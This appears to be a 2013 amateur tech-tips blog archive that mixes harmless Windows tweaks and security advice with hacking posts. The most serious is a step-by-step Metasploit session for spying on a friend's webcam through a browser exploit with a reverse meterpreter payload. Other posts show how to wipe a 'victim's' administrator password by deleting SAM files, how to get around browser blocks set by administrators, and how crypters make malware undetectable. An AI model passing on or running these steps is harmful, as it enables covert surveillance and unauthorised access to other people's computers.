Sunday, June 30, 2013

How to change IP address in every 10 seconds ??


This trick will illuminate you on
a method using which you can
change your ip address in every
10 seconds.
This change in IP address would
help you to surf anonymously
over the internet without any
kind of restriction based on
country ,number of view or any
other factor.
Change of IP address can be
easily done with the help of a
free software named as Elite
Proxy server
just go to the following website
and download one for yourself
here
Now that you have this
software . let me tell me some
of its features
Elite Proxy Switcher (Latest
version: 1.19)
Overview: Elite Proxy Switcher
can help you to visit
the blocked websites and
protect your Internet privacy.
How it works: Elite Proxy
Switcher changes your IP using
a proxy so that the website
regards the proxy's IP as your
IP. Thus your real IP is hidden.
Introduction: Elite Proxy
Switcher (EPS) is a proxy
software to test and use the
proxy list. It can test the details
(speed, anonymity, country and
whether gateway, ssl/
https, dangerous or codeen) of
the http proxy and change the
proxy settings of your browsers
(IE, Firefox and Chrome).
Elite Proxy Switcher Main
Features
Proxy Checker: professionally
test the details of the proxies.
Proxy Switcher: quickly change
the proxy settings of the
browsers.
Proxy Downloader: get daily
fresh proxy lists by just one
click.
Proxy Manager: easily maintain
your personal proxy list.
Just use this software now and
surf anonymously
NOTE: Don't use this to do
illegal activities.This post is for
educational purpose only
Have fun and enjoy !! 

Saturday, June 29, 2013

Make a bootable Windows 7 Usb/Pendrive/Jumpdrive


1. Grab a Windows 7 ISO image and extract it to a folder (not on the USB stick)
2. You can use a lot of programs, many of them free, to extract from an ISO. I use 7zip.
3. Grab a 4GB USB stick
4. Format the USB stick with NTFS using the “quick format”. (You can do this via Windows Explorer)
5. Open a CMD prompt (run it as administrator)
6. Run DISKPART
7. Select the volume for the USB stick. First enter LIST VOL to show the list.
8. Then enter SELECT VOL x where x is the volume number from the list
9. Mark the volume as active by entering ACTIVE
10. Enter EXIT to quit the DISKPART command line (but do not close the CMD prompt window)
11. In the CMD prompt window, go to the location where you extracted the Windows 7 files on your computer
12. Go into the BOOT folder
13. Type BOOTSECT /NT60 <drive letter>: where the drive letter is the USB drive.
14. Example BOOTSECT /NT60 G:
15. Copy all of the files you extracted for Windows 7 to the USB stick
16. On the computer you want to install Windows 7, go to your BIOS and make sure that boot from USB is enabled and in the correct position in the boot sequence.
Once all files are copied to the USB stick, you can plug the USB stick into a computer and boot from it to run Windows 7 setup.

How to make UNDELETABLE FOLDER



1.Goto command prompt from
run>cmd
2.change the directory to the
directory you want to make folder
by writing "cd\" and then
"D:" (write without quotes)
3. then write - md \lpt1\\ and press
enter..The folder is created.

Improve Windows XP Shutdown Speed

This tweak reduces the time XP waits before automatically closing any running programs when
you give it the command to shutdown.

Go to Start then select Run
Type 'Regedit' and click ok Find
'HKEY_CURRENT_USER\Control Panel\Desktop\'
Select 'WaitToKillAppTimeout' Right click and select 'Modify'
Change the value to '1000' Click 'OK'

Now select 'HungAppTimeout' Right
click and select 'Modify'
Change the value to '1000' Click 'OK'

Now find
'HKEY_USERS\.DEFAULT\Control Panel \Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify' Change
the value to '1000'
Click 'OK' Now find
'HKEY_LOCAL_MACHINE\System
\CurrentControlSet\Control\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000' Click 'OK'

Use Or Surf Internet Without Any Browser.



Ever find yourself sitting in front of
a computer where Internet Explorer
or Firefox was blocked by IT
Administrator, and restricted you
from installing any software? If that
PC is running Windows
XP, then there is chance for you to
still surf Internet.
Just follow these simple steps:
1. Open Calculator, Start> Program
Files> Accessories> Calculator.
2. In Calculator, go to Help> Help
Topics.
3. Right click on the left hand side
of the title bar and click on 'Jump
to URL'.
4. Type in the URL and make sure
include the 'http://' at the
beginning.

How to create a bootable USB of Ubuntu(Linux)


To run Ubuntu from a USB stick, the first thing you need to do is insert a USB stick with at least 2GB of free space into your PC.

The easiest way to put Ubuntu onto your stick is to use the USB installer provided at pendrivelinux.com. You’ll need to download and install and follow the instructions.
Download Pen Drive Linux's USB Installer

1. Select Ubuntu Desktop Edition from the dropdown list.
2. Click 'Browse' and open the downloaded ISO file.
3. Choose the USB drive and click 'Create'.
That's it!

How to "Delete administrator Password" without any software


Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer 

Hack your friend webcam using metasploit



Open Metasploit and run following commands:

msf> show exploits

msf>use windows/browser/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp

msf exploit(adobe_cooltype_sing) > show options

Module options (exploit/windows/browser/adobe_cooltype_sing):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) >exploit -j

Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.

msf exploit(adobe_cooltype_sing) > session -i 1

meterpreter> run webcam

and you will get the webcam of ur frnd. 

What is a Computer Virus ?



A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.

Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.

Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :-Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :-A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :-These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :-Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.

Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.

This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won't be covered under this tutorial.

Before we continue it is important to understand the generic malware terms that you will be reading about.

Backdoor- A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Hijackers- A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker's own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.

Spyware- A program that monitors your activity or information on your computer and sends that information to a remote computer without your Knowledge.

Adware- A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware.

There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.

Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.

Trojan- A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.

Worm- A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.

DIFFERENCE BETWEEN CORE I3, CORE I5 ANDCORE I7



Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading ­ (efficient use of processor resources)
* 3-4 MB Catche
* 32 nm Silicon (less heat and energy)
Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading ­ (efficient use of processor resources)
* 3-8 MB Catche
* 32-45 nm Silicon (less heat and energy)
Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading ­ (efficient use of processor resources)
* 4-8 MB Catche
* 32-45 nm Silicon (less heat and energy)

How To Lock Computer With USB Flash Drive


Today i'll shw you how can you lock ur own pc with usb flash
drive Guys this tips will not workon all versions on windows
including both windows 32 bit and 64 bit.
1.First you Download predator software
2.Predator software will get launched automatically after
completing installation if not you can run it from Start/
Programs/Predator
3. Now Insert your Usb. You will get a message todefine your
newpassword (This process will not format your pendrive and
your pendrive data will not be affectedby this at all)
4. Now Click on Ok and Then Enter your your new password
innext dialog box
5. Check that the drive letter displayed under “USB key drive”
actually matches your flash driveor choose the correct letter
from the dropdown list
6. Finally click on Create Key button and then on OK button
After this the software will automatically exit.Now restart ur
program by clicking the icon on desktop.
Predator will take few seconds for initialization. Once the icon in
the taskbar turns green then your software has initialized itself.

Video games advantages



1. Videogames prepare people to
make decisions faster
2. They also improve creativity and
imagination
3. They improve coordination
"hand-eye" and the ability to drive
in foggy weather
4. People that play videogames
make decisions 25% faster
5. They can also focus on 6 things
at a time without confusing them
and they develop the capacity to
solve several problems in different
situations

Tips To Remove Software Properly From Your PC !!!



The IT industry can be pretty daunting without proper education. Creighton online programs can help anyone properly prepare to be highly successful in the tech world.

There are many software programs available in themarket, which are not heavy, but take more space when you check after installation. It is because you did not check the instructions when you started installing them. They actually have some paired toolbars or some other software that took more drive space. The result is that yoursystem becomes very slow and you definitely like to uninstall unwanted software from your PC.

Tips to Remove/ Uninstall Software

Here are some handy tips for you, by following which you can properly remove any software from your machine:

TIP 1: The simplest way to remove software from your machine is to remove it from control panel that any unprofessional computer user can also do. But, for your convenience, we have mentioned in proper steps.By following these steps, you can easily uninstall any software from your PC:
Click on Start button
Then, select Control panel and look for Add/ Remove Programs
A list will appear (here, you can select any program that you wish to uninstall from your PC)
Right click on your desired software and select “Uninstall” (It will take some time to uninstall.So, wait until the uninstall process gets completed.)
After the process is complete, you should restart your PC.

And here you go; you have uninstalled the software that was troubling you. Hopefully, this will work perfect, but if it did not work, then you can use the next alternative way(s):

TIP 2: A person who uses his computer 20 or more hours a day, it’s really annoying for him when suddenly his PC starts working very slow.Many of you may already have some idea of why some of our uninstalled programs still reside in our PC’s registry. It is because some entries still stay in our windows registry and will stay there until you remove them manually.

To modify/remove registry, go to “Run” and then type “Regedit”. And in Regedit, you can make changes related to your desired software, but if you are not a computer professional, then do not try to mess up with the registry, because it will create more problems if you unintentionally remove/modify the wrong entries.

TIP 3: There is hardly any problem in the online scenario that cannot be resolved by software. There are also many uninstallers available that you can use to uninstall specific programs. Also, there are numerous software applications that provide their own uninstallers with installation packages and you can use them to remove software completely.

The advantage of using these uninstallers is that they exactly know where your installed software had made changes in your system. When you start searching about some software uninstallers, you will see many uninstallers and it will become very difficult to select the perfect one. For this, your can also get recommendations from your friends or computer professionals via any forum. By following these tips, you can easily uninstall your problematic software apps from your machine that were actually creating problems.

Windows 8 Shortcut Keys


Shortcut Description
Windows Key + D Show Desktop
Windows Key + C Open Charms Menu
Windows Key + F Charms Menu – Search
Windows Key + H Charms Menu – Share
Windows Key + K Charms Menu – Devices
Windows Key + I Charms Menu – Settings
Windows Key + Q Search For Installed Apps
Windows Key + W Search Settings
Windows Key + Tab Cycle through open Modern UI Apps
Windows Key + Shift + Tab Cycle through open Modern UI Apps in reverse order
Windows Key + . Snaps app to the right (split screen multitasking)

Windows Key + Shift + . Snaps app to the left (split screen multitasking)
Windows Key + , Temporarily view desktop
Alt + F4 Quit Modern UI Apps
Windows Key + E Launch Windows Explorer Window
Windows Key + L Lock PC and go to lock screen
Windows Key + T Cycle through icons on taskbar (press Enter to launch app)
Windows Key + X Show Advanced Windows Settings Menu
Windows Key + E Launch Windows Explorer Window
Windows Key + Page Down Moves Start screen and apps to secondary monitor on the right
Windows Key + M Minimize all Windows
Windows Key + Shift + M Restore all minimized Windows
Windows Key + R Open Run dialog box
Windows Key + Up Arrow Maximize current window
Windows Key + Down Arrow Minimize current window
Windows Key + Left Arrow Maximize current window to left side of the screen
Windows Key + Right Arrow Maximize current window to right side of the screen
Ctrl + Shift + Escape Open Task Manager
Windows Key + Print Screen Takes a Print Screen and saves it to your Pictures folder
Windows Key + Page Up Moves Start screen and apps to secondary monitor on the left
Windows Key + Pause Break Display System Properties
Shift + Delete Permanently delete files without sending it to Recycle Bin
Windows Key + F1 Open Windows Help and Support
Windows Key + V Cycle through notifications
Windows Key + Shift + V Cycle through notifications in reverse order
Windows Key + 0 to 9 Launch/show app pinned to taskbar at indicated number
Windows Key + Shift + 0 to 9 Launch new instance of app pinned to taskbar at indicated number
Alt + Enter Display Properties of selected item in File Explorer
Alt + Up Arrow View upper level folder of current folder in File Explorer
Alt + Right Arrow View next folder in File Explorer
Alt + Left Arrow View previous folder in File Explorer
Windows Key + P Choose secondary display modes
Windows Key + U Open Ease of Access Center
Alt + Print Screen Print Screen focused Window only
Windows Key + Spacebar Switch input language and keyboard layout
Windows Key + Shift + Spacebar Switch to previous input language and keyboard layout
Windows Key + Enter Open Narrator
Windows Key + + Zoom in using Magnifier
Windows Key + - Zoom out using Magnifier
Windows Key + Escape Exit Magnifier

Shut Down your Computer using "C" Programming

/*press y for shutdown your computer (for windows 7).
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
#include <stdio.h>
 #include <stdlib.h>
 
using namespace std;
 
main()
 {
 char ch;
 
printf("Do you want to shutdown your computer now (y/n)\n");
 scanf("%c",&ch);
 
if (ch == 'y' || ch == 'Y')
 system("C:\\WINDOWS\\System32\\shutdown /s");
 
return 0;
 }

Anti Hacking Tips:


1. Always log off Faceboock and any Chat Sites.
2. Always log off all e-mail accounts.
3. Change all passwords every three to six months.
4. Do not go to any questionable websites.
5. Turn computer/laptop off when not in use for more than two hours.

Some useful terms you need to know

What is hacking?
A: The terms "hack" are also used
to refer to a modification of a
program or device to give the user
access to features that were
otherwise unavailable, such as DIY
circuit bending. It is from this
usage that the term "hacking" is
often incorrectly used to refer to
more nefarious criminal uses such
as identity theft, credit card fraud
or other actions categorized as
computer crime.
Q: What is cracking?
A: Password cracking is the process
of recovering passwords from data
that has been stored in or
transmitted by a computer system.
A common approach is to
repeatedly try guesses for the
password. The purpose of password
cracking might be to help a user
recover a forgotten password
(though installing an entirely new
password is less of a security risk,
but involves system administration
privileges), to gain unauthorized
access to a system, or as a
preventive measure by system
administrators to check for easily
crackable passwords. On a file-by
file basis, password cracking is
utilized to gain access to digital
evidence for which a judge has
allowed access but the particular
file's access is restricted.
Q: What is a virus/trojan/
malicious script?
A: A computer virus is a computer
program that can copy itself and
infect a computer. The term "virus"
is also commonly but erroneously
used to refer to other types of
malware, adware, and spyware
programs that do not have the
reproductive ability. A true virus
can only spread from one computer
to another (in some form of
executable code) when its host is
taken to the target computer; for
instance because a user sent it
over a network or the Internet, or
carried it on a removable medium
such as a floppy disk, CD, DVD, or
USB drive. Viruses can increase
their chances of spreading to other
computers by infecting files on a
network file system or a file system
that is accessed by another
computer..
Q: What is a stealer?
A: A stealer is a software designed
to create viruses. This virus is
called as a server. You send the
server to the victim and if they
open it all their passes (according
to how the stealer is built) will be
sent to you via email, or ftp or a
php webhost.
Q: What is a RAT?
A: A Rat is a software created that
created similar servers (virus). If
the victim opens it they will be
your RAT. You can have a complete
access to their system. There are
hundereds of features.
RAT - Remote Administration Tool.
Q: What is a keylogger?
A: A keylogger is a software
designed to create servers. You
send the server to the victim and if
they open it all their keystrokes
would be sent you via email, ftp,
php webhost etc.
Q: What is BOT?
A: A bot is a malicious program
which has several purposes. They
are usually told what to do by a
botnet admin although many of
the features now are automated.
Q: What is a BOTNET?
A: A botnet is a network of
infected computers that all connect
to one area where they are
commanded by the botnet admin.
Q: What is a crypter?
A: All your servers that you create
of a keylogger, stealer, RATs etc.
are detected by antivirus. So
inorder to make it FUD (Fully
UnDetectable) we use a crypter
and crypt your infected server.
Q: How does a crypter work?
A: A crypter has a built in or
external file called stub. This stub
is based on common encryptions
like rc4, xor, tweafish, blowfish etc.
When you crypt your infected file
the crypter embeds the stub onto
your server and covers the server.
Just like how you paint your rusted
metals. And makes it undetectable
from anti-virus.
Q: What is reverting?
A: Reverting is a technique used to
obtain forgotten passwords. But a
hacker uses this method to access
the victims account.
Q: What is social engineering?
A: It is a psychological approach,
where you manipulate people into
performing actions or divulging
confidential information, rather
than by breaking in or using
technical hacking techniques
(essentially a fancier, more
technical way of lying).
Q: What is DDos?
A: DOS - Denial Of Service.
This is using bots. If you have a
large number of bots you make
them send packets to the target
site and make them break down.
Q: How is website and forum
hack possible?
A: There are lots of methods. The
most basic one is you find exploits
on a webserver and use them to
gain access and deface it. Sql, XSS,
LFI, RFI, DNS poisoning etc.
Q: Can everyone be Hacker?
A: Yes, but u have a brain and
common sense.

Friday, June 28, 2013

Windows 8 key features over its predecessor Win 7


1- Fast booting process
2- windows to go feature ( most fantastic and mind blowing feature)
3- Metro
4- apps for different purposes

How to use Pendrive as RAM

-for XP

Insert your pen-drive. Let your PC read it.
(Minimum 2 GB)
Right click on My Computer.

Click on Properties from context menu.

Click on Advanced tab.

Click on Settings under Performance.

Click on Advanced tab.

Click on Change button under Virtual memory. Select your USB drive.

Click on custom size radio button and give the values as follows;

Initial Size:1020

Maximum size:1020

The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size. Click on Set button, then click on OK.

Now you have to restart the computer. The speed of your computer will be increase !

For Windows 7:
Plug in your pendrive-> Format with NTFS or FAT32

Now go to properties->Select Ready Boost Check Use this device->Choose maximum space to reserve system speed Click on Apply and OK. Your ready boost Pen Drive is ready Now to Use.

Here is an personal suggestion HP and Scandisk is the Best for this work so what are you waiting for.

10 Ways to Work More Securely

1. Work with your IT department
Make sure that you install all of the patches and updates that your IT department recommends. In addition to installing Windows and Office updates, your IT department might require you to install additional security software, such as a firewall or custom software to help you connect from remote locations. Making these regular installations will keep your computer and your company's network as secure as possible.

2. Use strong passwords
Passwords provide the first line of defense against unauthorized access to your computer, and a good password is often underestimated. Weak passwords provide attackers with easy access to your computer and network. Strong passwords are considerably harder to crack, even with the latest password-cracking software.
A strong password:
Is at least eight characters long.
Does not contain your user name, real name, or company name.
Does not contain a complete dictionary word.
Is significantly different from previous passwords. Passwords that change just slightly—such as Password1, Password2, Password3—are not strong.
Contains characters from each of the following groups:
Uppercase and/or lowercase letters.
Numbers
Symbols (!,@,#,$,%, etc.)

3. Don't enable the Save Password option
Make it mandatory for you—or someone else trying to access your computer—to enter your password on all operating system or application settings. If a dialog box prompts you about remembering the password, rather then requiring you to enter it, just choose no. Allowing the password to be saved negates having the password at all.

4. Use network file shares instead of local file shares
Rather than opening up your computer to co-workers, use network file shares to collaborate on documents. And restrict access to the network file share to only those who need it. If you're working on a team, you have lots of other options—for example, Microsoft SharePoint Workspace 2010.

5. Lock your computer when you leave your desk
If you're going to be away from your desk for a while, make sure your computer is locked.
To lock your computer:
On your keyboard, press CTRL+ALT+DELETE at the same time.
Click Lock this computer (Lock Computer if you're running Windows XP).
To unlock your computer, press CTRL+ALT+DELETE and enter your password.

6. Use password protection on your screensaver
Sometimes you're away from your desk for longer than you unexpected. Plan for those situations by setting up your computer so that it locks itself after a specified amount of time.

To establish Windows 7 screensaver password protection
Right click an empty space on your desktop.
Click Personalize, and then click the Screen Saver section.
Change Wait time to 10 minutes or less.
Select On resume, display logon screen.
Click Apply.
To establish Windows Vista screensaver password protection
Right click an empty space on your desktop.
Click Personalize, and then click the Screen Saver section.
Change Wait time to 10 minutes or less.
Select On resume, password protect.
Click Apply.
To establish Windows XP screensaver password protection
Right click an empty space on your desktop.
Click Properties, and then the Screen Saver tab.
Change Wait time to 10 minutes or less.
Select On resume, password protect.
Click Apply.
7. Encrypt files containing confidential or business critical files
You keep valuable and sensitive data on your computer. You might have sensitive information about your company or clients, or your personal bank statements on a laptop you use at home and work. Encrypting your data keeps it as secure as possible. To help keep unauthorized people from accessing your data—even if your computer is lost or stolen—you should encrypt all sensitive data. In the Enterprise and Ultimate editions of Windows Vista, you can use BitLocker™ Drive Encryption to encrypt the entire volume. In Windows XP and all editions of Windows Vista, you can use the Encrypting File System (EFS) to protect important files. We highly recommend that you learn how to encrypt a file or folder to keep it safe.

8. Don't open questionable emails
If an email message just doesn't look right, it probably isn't. Forward the email message to your IT administrator to verify before you open it.

9. Encrypt email messages when appropriate
If you're sending confidential or business-critical information, encrypt the email and any files attached to it. Only recipients who have the private key that matches the public key you used to encrypt the message can read it.

10. Use the Junk Email Filter in Outlook
Receiving spam, or junk email messages, isn't just annoying. Some spam can include potentially harmful viruses that can cause damage to your computer and your company's network. The Junk Email Filter reduces the amount of junk email messages, or spam, you receive in your Inbox. Good news—if your junk mail filter is already active. But you can always change the settings.